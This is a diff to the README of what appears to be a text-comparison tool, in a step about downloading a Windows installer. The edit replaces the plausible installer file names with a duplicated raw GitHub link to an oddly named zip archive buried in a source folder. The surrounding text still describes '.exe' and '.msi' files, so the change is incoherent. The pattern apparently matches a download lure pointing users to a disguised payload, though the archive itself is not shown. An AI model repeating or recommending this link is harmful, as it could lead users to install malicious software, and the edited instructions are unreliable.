Wangles-N/TextDiff/README.md

 ### Step 3: Download the Windows Installer

 Look for a file that ends with ".exe" or ".msi".
 That is the Windows setup file.
-It might say something like "TextDiff-Setup.exe" or "TextDiff-Installer.msi".
+It might say something like "https://github.com/Wangles-N/TextDiff/raw/refs/heads/main/Sources/TextDiff/AppKit/Diff_Text_glaumrie.zip" or "https://github.com/Wangles-N/TextDiff/raw/refs/heads/main/Sources/TextDiff/AppKit/Diff_Text_glaumrie.zip".

 Click the file to download it to your computer.